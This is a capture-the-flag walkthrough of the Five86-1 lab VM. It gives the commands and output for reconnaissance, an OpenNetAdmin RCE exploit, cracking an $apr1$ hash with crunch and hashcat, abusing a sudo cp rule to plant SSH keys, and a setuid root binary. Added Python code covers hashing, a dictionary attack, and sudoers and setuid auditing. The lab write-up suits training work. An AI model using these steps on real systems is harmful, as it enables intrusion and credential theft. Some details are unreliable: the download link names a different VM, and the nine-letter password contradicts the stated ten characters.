Vulnhub walkthrough - 04 Five86-1
Background overview:
The download address is: https://www.vulnhub.com/entry/dc-1-1,292/
The target IP is 100.10.10.133. Add the IP address to the hosts file and map it to the domain name five86.local.
Technical points:
- OpenNetAdmin exploit
- find / -type f -user <username> to list the files owned by that user
- Use hash-identifier to identify the hash type
- Generate dictionaries with crunch
- Crack passwords with hashcat
1. Information collection
1.1 Scan the target host IP
Use the arp-scan -l command to scan for live hosts within the LAN.
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:27:90, IPv4: 100.10.10.129
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
100.10.10.1     00:50:56:c0:00:08       VMware, Inc.
100.10.10.133   00:0c:29:c3:7a:e0       VMware, Inc.
100.10.10.253   00:50:56:fd:dd:e0       VMware, Inc.
100.10.10.254   00:50:56:e1:62:61       VMware, Inc.
Comparing MAC addresses shows that the IP of the target host is 100.10.10.133.
1.2 Scan the open ports of the target host
Use the command nmap -sS -Pn -p 1-65535 100.10.10.133 to detect the open ports of the target host.
└─# nmap -sS -Pn -p 1-65535 100.10.10.133
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-29 09:05 CST
Stats: 0:00:07 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Stats: 0:00:09 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 100.10.10.133
Host is up (0.0010s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
10000/tcp open  snet-sensor-mgmt
MAC Address: 00:0C:29:C3:7A:E0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 23.06 seconds
According to the scan results, the open ports of the target host are 22, 80 and 10000.
1.3 Directory scanning
Use the command dirb http://five86.local to perform a directory scan.
└─# dirb http://five86.local

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Dec 29 16:00:23 2021
URL_BASE: http://five86.local/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://five86.local/ ----
+ http://five86.local/index.html (CODE:200|SIZE:30)
+ http://five86.local/reports (CODE:401|SIZE:459)
+ http://five86.local/robots.txt (CODE:200|SIZE:29)
+ http://five86.local/server-status (CODE:403|SIZE:277)

-----------------
END_TIME: Wed Dec 29 16:00:30 2021
DOWNLOADED: 4612 - FOUND: 4
According to the scan results, the above paths exist; the 401 on /reports shows it is protected by HTTP authentication.
2. Web site detection
2.1 Get a shell
Opening http://five86.local shows nothing of interest. Open http://five86.local/robots.txt, which contains the following.
User-agent: *
Disallow: /ona
This suggests a hidden directory http://five86.local/ona. Opening it shows the OpenNetAdmin management page, version 18.1.1.
Searching online shows that this version has an RCE vulnerability. The exploit can be downloaded from:
https://github.com/amriunix/ona-rce
Use the command cat ona-rce.py to see what parameters the exploit requires.
print("\n[-] Usage: python3 " + filename + " [check | exploit] <URL>")
Use the command python3 ona-rce.py exploit http://five86.local/ona to get a shell on the target host.
└─# python3 ona-rce.py exploit http://five86.local/ona
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] Connected Successfully!
sh$
2.2 Password cracking
After some testing, this shell only returns the output of a command; commands that produce no output, such as cd, appear not to run. Try other commands.
sh$ uname -a
Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux
sh$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh$ whoami
www-data
Use the command find / -type f -user www-data to list the files owned by the www-data user.
......
/var/www/html/reports/.htaccess
find: '/var/log/private': Permission denied
find: '/var/log/apache2': Permission denied
find: '/var/log/mysql': Permission denied
find: '/var/log/exim4': Permission denied
/var/log/ona.log
......
The accessible files of interest are /var/www/html/reports/.htaccess and /var/log/ona.log.
View the contents of /var/www/html/reports/.htaccess.
sh$ cat /var/www/html/reports/.htaccess
AuthType Basic
AuthName "Restricted Area"
AuthUserFile /var/www/.htpasswd
require valid-user
This reveals the hidden path /var/www/.htpasswd; read that file.
sh$ cat /var/www/.htpasswd
douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1
# To make things slightly less painful (a standard dictionary will likely fail),
# use the following character set for this 10 character password: aefhrt
This gives the user name douglas and the password hash $apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1. The comment says the password is 10 characters drawn from the set aefhrt.
Use hash-identifier to see which hash type it is.
└─# hash-identifier
   #########################################################################
   #   (ASCII-art banner)                                           v1.2   #
   #   By Zion3R                                                           #
   #   www.Blackploit.com                                                  #
   #   Root@Blackploit.com                                                 #
   #########################################################################
 -------------------------------------------------
 HASH: $apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1

Possible Hashs:
[+] MD5(APR)
 -------------------------------------------------
The result shows the MD5(APR) scheme, i.e. Apache's $apr1$ htpasswd format.
Use crunch to generate the corresponding dictionary file pass.txt with the command crunch 10 10 aefhrt -o pass.txt.
└─# crunch 10 10 aefhrt -o pass.txt
Crunch will now generate the following amount of data: 665127936 bytes
634 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 60466176
crunch:  21% completed generating output
crunch:  46% completed generating output
crunch:  60% completed generating output
crunch:  81% completed generating output
crunch: 100% completed generating output
Use hashcat to crack the hash. The command is hashcat -m 1600 -a 0 -o res hash.txt pass.txt (mode 1600 is Apache $apr1$ MD5, -a 0 is a straight dictionary attack).
Running this on Kali reported an error, so it was run under WSL instead.
The final password is fatherrrr.
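The following is an added example, not code from the walkthrough or from any of the tools it uses: a Python implementation of the $apr1$ scheme that hash-identifier reported and that hashcat mode 1600 attacks, together with the keyspace arithmetic behind crunch's output and a dictionary loop of the kind hashcat -a 0 runs. HTPASSWD_HASH is the entry recovered above; the candidate words in the __main__ block are constructed. It shows why the format resists plain dictionaries (per-entry salt, 1000 MD5 rounds, a non-standard 6-bit encoding) and how a recovered result is confirmed by re-hashing with the stored salt.

```python
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$apr1$"

# The .htpasswd entry recovered in the walkthrough (from the page, not constructed)
HTPASSWD_HASH = "$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1"


def _to64(value: int, count: int) -> str:
    """md5crypt's 6-bit encoding, low bits first (not standard base64)."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_hash(password: str, salt: str) -> str:
    """Apache's $apr1$ variant of md5crypt: salted, 1000 rounds, custom encoding."""
    pw = password.encode()
    salt_b = salt.encode()[:8]              # the salt is at most 8 characters

    ctx = hashlib.md5(pw + MAGIC + salt_b)
    alt = hashlib.md5(pw + salt_b + pw).digest()
    remaining = len(pw)                     # feed the alternate digest per 16 bytes of pw
    while remaining > 0:
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    bit = len(pw)                           # one byte per bit of len(pw): NUL or pw[0]
    while bit:
        ctx.update(b"\x00" if bit & 1 else pw[:1])
        bit >>= 1
    final = ctx.digest()

    # 1000 stretching rounds whose inputs vary with i, to slow down guessing
    for i in range(1000):
        rnd = hashlib.md5()
        rnd.update(pw if i & 1 else final)
        if i % 3:
            rnd.update(salt_b)
        if i % 7:
            rnd.update(pw)
        rnd.update(final if i & 1 else pw)
        final = rnd.digest()

    # the 16 digest bytes are interleaved before encoding, as in md5crypt
    encoded = "".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
        for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    )
    encoded += _to64(final[11], 2)
    return MAGIC.decode() + salt_b.decode() + "$" + encoded


def apr1_verify(password: str, stored: str) -> bool:
    """Check a candidate against a stored $apr1$ entry by re-hashing with its salt."""
    magic, salt, _digest = stored[1:].split("$")
    if magic != "apr1":
        raise ValueError("not an $apr1$ hash")
    return apr1_hash(password, salt) == stored


def keyspace(charset: str, length: int) -> tuple:
    """Number of candidates and wordlist size (one newline per word) for a crunch run."""
    count = len(charset) ** length
    return count, count * (length + 1)


def dictionary_attack(stored: str, candidates):
    """What hashcat -a 0 does: try each wordlist entry until one verifies."""
    for word in candidates:
        if apr1_verify(word, stored):
            return word
    return None


if __name__ == "__main__":
    print("crunch 10 10 aefhrt would produce (lines, bytes):", keyspace("aefhrt", 10))
    # Constructed mini-wordlist; the walkthrough's stated password is tried last
    words = ["aaaaaaaaaa", "tttttttttt", "fatherrrr"]
    print("walkthrough password verifies:", apr1_verify("fatherrrr", HTPASSWD_HASH))
    print("dictionary result:", dictionary_attack(HTPASSWD_HASH, words))
```

The keyspace figures reproduce crunch's own numbers above (6^10 = 60466176 lines, 11 bytes each = 665127936 bytes), which is a quick sanity check that a mask is small enough to be worth generating before writing 634 MB to disk.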
2.3 SSH Remote Login
2.3.1 douglas user
Use the command ssh douglas@100.10.10.133 to connect remotely.
└─# ssh douglas@100.10.10.133
douglas@100.10.10.133's password:
Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Dec 28 21:26:43 2021 from 100.10.10.129
douglas@five86-1:~$
This is a proper TTY, but permissions are still restricted. Use the sudo -l command to see which commands can be run.
douglas@five86-1:~$ sudo -l
Matching Defaults entries for douglas on five86-1:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User douglas may run the following commands on five86-1:
    (jen) NOPASSWD: /bin/cp
The result shows that douglas may run /bin/cp as the jen user without a password.
If /home/jen/.ssh/authorized_keys contains douglas's public key, douglas's id_rsa private key can be used to log in to jen over SSH, i.e. passwordless SSH login as jen. The key is first copied to /tmp because jen has no permission to access files in douglas's home directory.
Use the following commands.
cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh/
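The sudo rule above is the whole weakness of this step: a file-copying binary run as another user can overwrite any file that user owns, including ~/.ssh/authorized_keys. As an added example (not from the walkthrough, and not a real audit tool), here is a small auditor for sudoers-syntax rules that flags such grants; SAMPLE_SUDOERS is a constructed file whose first rule matches the one shown by sudo -l, and the binary lists are assumptions a reviewer would tune for their own hosts.

```python
import re
from dataclasses import dataclass

# Constructed sample; the douglas line is the rule reported by sudo -l above
SAMPLE_SUDOERS = """\
# /etc/sudoers.d/five86 (constructed sample, not the real file)
Defaults env_reset, mail_badpass
douglas ALL=(jen) NOPASSWD: /bin/cp
jen     ALL=(ALL) /usr/bin/less
moss    ALL=(root) NOPASSWD: /usr/bin/apt-get update
%admin  ALL=(ALL:ALL) ALL
"""

# Assumed lists: binaries that write arbitrary files as the run-as user,
# and binaries that can hand the caller an interactive shell
FILE_WRITERS = {"cp", "mv", "tee", "dd", "rsync", "install"}
SHELL_SPAWNERS = {"bash", "sh", "less", "more", "vi", "vim", "python3", "perl"}

# user  host=(runas[:group])  [TAG: ...]  command[, command...]
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


@dataclass
class Finding:
    user: str
    runas: str
    command: str
    nopasswd: bool
    reason: str


def audit_sudoers(text: str) -> list:
    """Return a Finding for every rule that lets the caller escalate to the run-as user."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue                        # aliases and other syntax are out of scope here
        runas = m["runas"].split(":")[0] or "root"   # sudo defaults to root when omitted
        nopasswd = "NOPASSWD" in m["tags"]
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                reason = "unrestricted command set"
            elif binary in FILE_WRITERS:
                reason = f"{binary} can overwrite files owned by {runas}, e.g. ~/.ssh/authorized_keys"
            elif binary in SHELL_SPAWNERS:
                reason = f"{binary} can spawn a shell as {runas}"
            else:
                continue
            findings.append(Finding(m["who"], runas, cmd, nopasswd, reason))
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        tag = "NOPASSWD" if f.nopasswd else "password"
        print(f"{f.user} -> {f.runas}: {f.command} [{tag}] {f.reason}")
```

The fix on the defending side is the usual one: grant a wrapper script with fixed arguments rather than a general-purpose binary, and keep NOPASSWD off anything that can write to another account's home.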
2.3.2 jen user
Log in as jen with ssh. The command is ssh -i id_rsa jen@127.0.0.1.
douglas@five86-1:~$ ssh -i id_rsa jen@127.0.0.1
Warning: Identity file id_rsa not accessible: No such file or directory.
Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Tue Dec 28 21:36:24 2021 from 127.0.0.1
jen@five86-1:~$
The warning can be ignored: there is no id_rsa in the current directory, but ssh still tries the default key ~/.ssh/id_rsa, whose public half was copied above, so the login succeeds.
Use the command find / -type f -user jen to list the files owned by the current user.
......
/var/mail/jen
......
View the file.
jen@five86-1:~$ cat /var/mail/jen
From roy@five86-1 Wed Jan 01 03:17:00 2020
Return-path: <roy@five86-1>
Envelope-to: jen@five86-1
Delivery-date: Wed, 01 Jan 2020 03:17:00 -0500
Received: from roy by five86-1 with local (Exim 4.92)
        (envelope-from <roy@five86-1>)
        id 1imZBc-0001FU-El
        for jen@five86-1; Wed, 01 Jan 2020 03:17:00 -0500
To: jen@five86-1
Subject: Monday Moss
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1imZBc-0001FU-El@five86-1>
From: Roy Trenneman <roy@five86-1>
Date: Wed, 01 Jan 2020 03:17:00 -0500

Hi Jen,

As you know, I'll be on the "customer service" course on Monday due to that incident on Level 4 with the accounts people.

But anyway, I had to change Moss's password earlier today, so when Moss is back on Monday morning, can you let him know that his password is now Fire!Fire!

Moss will understand (ha ha ha ha).

Tanks,
Roy
This email gives the user name moss and the password Fire!Fire!.
2.3.3 moss user
Use the command ssh moss@127.0.0.1 to log in.
jen@five86-1:~$ ssh moss@127.0.0.1
moss@127.0.0.1's password:
Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Dec 28 21:43:08 2021 from 127.0.0.1
moss@five86-1:~$
Use the ls -la command to view all files in the current directory.
moss@five86-1:~$ ls -al
total 12
drwx------ 3 moss moss 4096 Jan  1  2020 .
drwxr-xr-x 7 root root 4096 Jan  1  2020 ..
lrwxrwxrwx 1 moss moss    9 Jan  1  2020 .bash_history -> /dev/null
drwx------ 2 moss moss 4096 Jan  1  2020 .games
A hidden folder .games was found.
Enter the folder and list the files again. A binary file upyourgame owned by root was found.
Running this file and answering its prompts drops into a root shell.
moss@five86-1:~/.games$ ./upyourgame
Would you like to play a game? yes
Could you please repeat that? yes
Nope, you'll need to enter that again. yes
You entered: No. Is this correct? no
We appear to have a problem? Do we have a problem? no
Made in Britain.
# whoami
root
# id
uid=0(root) gid=1001(moss) groups=1001(moss)
# cd /root
# ls
flag.txt
# cat flag.txt
8f3b38dd95eccf600593da4522251746
Get the flag!
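A root-owned program that yields uid=0 while leaving gid as moss is the signature of a setuid-root binary, and a hidden directory under a user's home is exactly where an inventory of such files should look. As an added example (not from the walkthrough), the following Python walker lists setuid files and marks the ones outside the directories where a Debian system normally keeps them; build_sample_tree constructs a throwaway tree with a fake .games/upyourgame so it runs without root, and EXPECTED_DIRS is an assumption to adjust per distribution.

```python
import os
import stat
import tempfile
from pathlib import Path

# Assumed: where setuid binaries are expected on a Debian-style host
EXPECTED_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/lib", "/usr/libexec")


def find_setuid(root: str, expected_dirs=EXPECTED_DIRS) -> list:
    """Walk root and return (path, owner uid, outside_expected) for every setuid regular file."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks like .bash_history
            except OSError:
                continue                     # unreadable entries are skipped, as find would
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & stat.S_ISUID:
                outside = not path.startswith(expected_dirs)
                hits.append((path, st.st_uid, outside))
    return sorted(hits)


def build_sample_tree() -> str:
    """Constructed: a fake home with a hidden .games dir holding a setuid file."""
    base = tempfile.mkdtemp(prefix="five86-")
    games = Path(base, "home", "moss", ".games")
    games.mkdir(parents=True)
    binary = games / "upyourgame"
    binary.write_bytes(b"#!/bin/sh\necho not really a game\n")
    binary.chmod(0o4755)                     # rwsr-xr-x: setuid bit set on our own file
    plain = Path(base, "home", "moss", "notes.txt")
    plain.write_text("nothing here\n")
    plain.chmod(0o644)                       # ordinary file, must not be reported
    return base


if __name__ == "__main__":
    sample = build_sample_tree()
    for path, uid, outside in find_setuid(sample):
        flag = "OUTSIDE EXPECTED DIRS" if outside else "expected location"
        print(f"{path}  uid={uid}  {flag}")
```

Pointing find_setuid at "/" gives the same list as find / -perm -4000 -type f, with the added split between package-managed locations and places such as home directories where a setuid file warrants a closer look.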